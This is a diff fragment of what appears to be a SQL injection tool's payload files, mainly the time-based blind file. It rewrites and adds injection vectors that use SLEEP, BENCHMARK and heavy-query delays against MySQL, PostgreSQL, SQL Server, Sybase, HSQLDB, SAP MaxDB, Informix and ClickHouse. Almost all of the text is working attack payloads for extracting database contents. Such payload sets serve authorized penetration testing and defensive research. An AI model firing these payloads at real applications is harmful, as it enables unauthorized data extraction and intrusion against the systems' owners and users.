+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
         <request>
@@ -588,10 +627,10 @@
 
     <test>
         <title>SAP MaxDB stacked queries (heavy query)</title>
-        <stype>5</stype>
+        <stype>4</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
         <request>
@@ -610,7 +649,7 @@
         <stype>4</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
         <request>
@@ -631,7 +670,7 @@
         <stype>4</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
         <request>
@@ -651,7 +690,7 @@
         <stype>4</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
         <request>
@@ -672,7 +711,7 @@
         <stype>4</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
         <request>

data/xml/payloads/time_blind.xml

@@ -2,98 +2,18 @@
 
 <root>
     <!-- Time-based boolean tests -->
-    <test>
-        <title>MySQL &gt;= 5.0.12 AND time-based blind</title>
-        <stype>5</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,9</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
-        <request>
-            <payload>AND SLEEP([SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0.12</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.0.12 OR time-based blind</title>
-        <stype>5</stype>
-        <level>1</level>
-        <risk>3</risk>
-        <clause>1,2,3,9</clause>
-        <where>1</where>
-        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
-        <request>
-            <payload>OR SLEEP([SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0.12</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.0.12 AND time-based blind (comment)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,9</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
-        <request>
-            <payload>AND SLEEP([SLEEPTIME])</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0.12</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.0.12 OR time-based blind (comment)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1,2,3,9</clause>
-        <where>1</where>
-        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
-        <request>
-            <payload>OR SLEEP([SLEEPTIME])</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0.12</dbms_version>
-        </details>
-    </test>
 
+    <!-- Prefering "query SLEEP" over "SLEEP" because of JOIN-alike cases where SLEEPs get called multiple times (e.g. http://testphp.vulnweb.com/listproducts.php?cat=1) -->
     <test>
         <title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</title>
         <stype>5</stype>
-        <level>2</level>
+        <level>1</level>
         <risk>1</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <where>1</where>
-        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -107,13 +27,95 @@
     <test>
         <title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title>
         <stype>5</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,8,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>AND SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)</title>
+        <stype>5</stype>
         <level>2</level>
         <risk>3</risk>
         <clause>1,2,3,9</clause>
         <where>1</where>
-        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
         <request>
-            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>OR SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP - comment)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>AND SLEEP([SLEEPTIME])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP - comment)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>OR SLEEP([SLEEPTIME])</payload>
+            <comment>#</comment>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -131,9 +133,9 @@
         <risk>1</risk>
         <clause>1,2,3,9</clause>
         <where>1</where>
-        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
             <comment>#</comment>
         </request>
         <response>
@@ -152,9 +154,9 @@
         <risk>3</risk>
         <clause>1,2,3,9</clause>
         <where>1</where>
-        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
             <comment>#</comment>
         </request>
         <response>
@@ -167,11 +169,11 @@
     </test>
 
     <test>
-        <title>MySQL &lt;= 5.0.11 AND time-based blind (heavy query)</title>
+        <title>MySQL &lt; 5.0.12 AND time-based blind (BENCHMARK)</title>
         <stype>5</stype>
         <level>2</level>
         <risk>2</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
         <request>
@@ -182,12 +184,32 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&lt;= 5.0.11</dbms_version>
+            <dbms_version>&lt; 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &lt;= 5.0.11 OR time-based blind (heavy query)</title>
+        <title>MySQL &gt; 5.0.12 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1,2,3,8,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 OR time-based blind (BENCHMARK)</title>
         <stype>5</stype>
         <level>2</level>
         <risk>3</risk>
@@ -202,12 +224,32 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&lt;= 5.0.11</dbms_version>
+            <dbms_version>&lt; 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &lt;= 5.0.11 AND time-based blind (heavy query - comment)</title>
+        <title>MySQL &gt; 5.0.12 OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 AND time-based blind (BENCHMARK - comment)</title>
         <stype>5</stype>
         <level>5</level>
         <risk>2</risk>
@@ -223,12 +265,33 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&lt;= 5.0.11</dbms_version>
+            <dbms_version>&lt; 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &lt;= 5.0.11 OR time-based blind (heavy query - comment)</title>
+        <title>MySQL &gt; 5.0.12 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 OR time-based blind (BENCHMARK - comment)</title>
         <stype>5</stype>
         <level>5</level>
         <risk>3</risk>
@@ -244,7 +307,28 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&lt;= 5.0.11</dbms_version>
+            <dbms_version>&lt; 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.12 OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.12</dbms_version>
         </details>
     </test>
 
@@ -296,9 +380,9 @@
         <risk>1</risk>
         <clause>1,2,3,9</clause>
         <where>1</where>
-        <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -316,9 +400,9 @@
         <risk>1</risk>
         <clause>1,2,3,9</clause>
         <where>1</where>
-        <vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
             <comment>#</comment>
         </request>
         <response>
@@ -335,7 +419,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <where>1</where>
         <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
         <request>
@@ -414,7 +498,7 @@
         <stype>5</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
         <request>
@@ -496,7 +580,7 @@
         <stype>5</stype>
         <level>2</level>
         <risk>2</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
         <request>
@@ -570,7 +654,7 @@
     </test>
 
     <test>
-        <title>Microsoft SQL Server/Sybase time-based blind</title>
+        <title>Microsoft SQL Server/Sybase time-based blind (IF)</title>
         <stype>5</stype>
         <level>1</level>
         <risk>1</risk>
@@ -586,12 +670,11 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
     <test>
-        <title>Microsoft SQL Server/Sybase time-based blind (comment)</title>
+        <title>Microsoft SQL Server/Sybase time-based blind (IF - comment)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>1</risk>
@@ -608,7 +691,6 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -617,7 +699,7 @@
         <stype>5</stype>
         <level>2</level>
         <risk>2</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1,2,3,8,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
         <request>
@@ -629,7 +711,6 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -650,7 +731,6 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -672,7 +752,6 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -694,7 +773,6 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -937,7 +1015,7 @@
         <stype>5</stype>
         <level>3</level>
         <risk>2</risk>
-        <clause>1,9</clause>
+        <clause>1,8,9</clause>
         <where>1</where>
         <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
         <request>
@@ -1337,7 +1415,123 @@
             <dbms_version>&gt; 2.0</dbms_version>
         </details>
     </test>
-    <!-- TODO: if possible, add payload for Microsoft Access -->
+
+    <test>
+        <title>Informix AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Informix OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Informix AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Informix OR time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3,9</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>ClickHouse AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
+        <request>
+            <payload>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>ClickHouse</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>ClickHouse OR time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>
+        <request>
+            <payload>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>ClickHouse</dbms>
+        </details>
+    </test>
+
     <!-- End of time-based boolean tests -->
 
     <!-- Time-based boolean tests - Numerous clauses -->
@@ -1412,9 +1606,9 @@
         <risk>1</risk>
         <clause>1,2,3,9</clause>
         <where>3</where>
-        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <vector>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -1426,7 +1620,7 @@
     </test>
 
     <test>
-        <title>MySQL &lt;= 5.0.11 time-based blind - Parameter replace (heavy queries)</title>
+        <title>MySQL &lt; 5.0.12 time-based blind - Parameter replace (BENCHMARK)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
@@ -1441,7 +1635,27 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&lt;= 5.0.11</dbms_version>
+            <dbms_version>&lt; 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.12 time-based blind - Parameter replace (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3,9</clause>
+        <where>3</where>
+        <vector>IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
+        <request>
+            <payload>(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.12</dbms_version>
         </details>
     </test>
 
@@ -1558,7 +1772,6 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -1697,7 +1910,7 @@
             <dbms>IBM DB2</dbms>
         </details>
     </test>
-    
+
     <!-- Untested -->
     <test>
         <title>HSQLDB &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
@@ -1705,7 +1918,7 @@
         <level>4</level>
         <risk>2</risk>
         <clause>1,2,3,9</clause>
-        <where>1</where>
+        <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
@@ -1725,7 +1938,7 @@
         <level>5</level>
         <risk>2</risk>
         <clause>1,2,3,9</clause>
-        <where>1</where>
+        <where>3</where>
         <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
         <request>
             <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
@@ -1738,6 +1951,25 @@
             <dbms_version>&gt; 2.0</dbms_version>
         </details>
     </test>
+
+    <test>
+        <title>Informix time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3,9</clause>
+        <where>3</where>
+        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
